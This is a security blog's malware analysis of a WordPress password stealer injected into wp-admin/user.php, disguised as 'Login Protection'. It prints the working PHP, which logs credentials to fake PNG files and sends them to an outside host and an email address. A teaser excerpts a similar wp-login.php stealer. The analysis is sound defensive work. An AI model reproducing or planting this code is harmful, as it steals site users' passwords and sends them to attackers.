WordPress password stealer

  • November 27, 2013
Labs Note

Following Fio’s recent post on the Joomla password stealer, here’s another beautiful example of password stealer. This time from WordPress environment.

It’s easy to understand, but what’s interesting – it looks like legitimate code so you can easily overlook it. It stores its data in “png” files within ./wp-includes/images/ path and sends them to a non-obfuscated email address.

This is the bad part that was injected on the file user.php on wp-admin:

// Start Login Protection
    $ip = $_SERVER["REMOTE_ADDR"];
    $stringData = $_SERVER["SERVER_NAME"] . "|" . $username . ":" . $password . "|" . $ip . "\n";
    $today = date("j");
    $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
    $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
    $failedLogContent = @file_get_contents($myErrorFile);
    $successLogContent = @file_get_contents($mySuccessFile);
    $errorFileLines = explode("\n", $failedLogContent);
    $diff = $today - $errorFileLines[0];
    if ( ($diff >= 7) || ($diff < 0) ) { @unlink($myErrorFile); $failedLogContent = ""; }
        if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
        preg_match_all("/{$ip}/i", $failedLogContent, $matches);
        if  ( (count($matches[0]) > 5) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
    if ( wp_check_password($password, $userdata->user_pass, $userdata->ID) ) {
    @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
    @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
    if (!$userOk) {
    $fh = fopen($mySuccessFile, "a");
    fwrite($fh, "$ip\n");
    fclose($fh);
    }
    } else {
    if (!(is_file($myErrorFile))) {
    $fh = fopen($myErrorFile, "w");
    fwrite($fh, "$today\n");
    fclose($fh);
    }
    $fh = fopen($myErrorFile, "a");
    fwrite($fh, $stringData);
    fclose($fh);
    }
// END Login Protection</pre>

Anyway, keep your eyes open, guys 🙂

Peter Gramantik is Sucuri’s Sr. Malware Researcher who joined the company in 2013. Peter’s main responsibilities include crafting signatures for new malware, and improving existing and researching new detection techniques. His professional experience covers 15 years of fighting malware. When Peter isn’t researching malware, you might find him doing technical and cave dives, riding his Harley Davidson, playing the guitar and singing in a band, or cooking BBQ for his family and friends. Connect with Peter on Twitter.

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

  • July 28, 2019
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post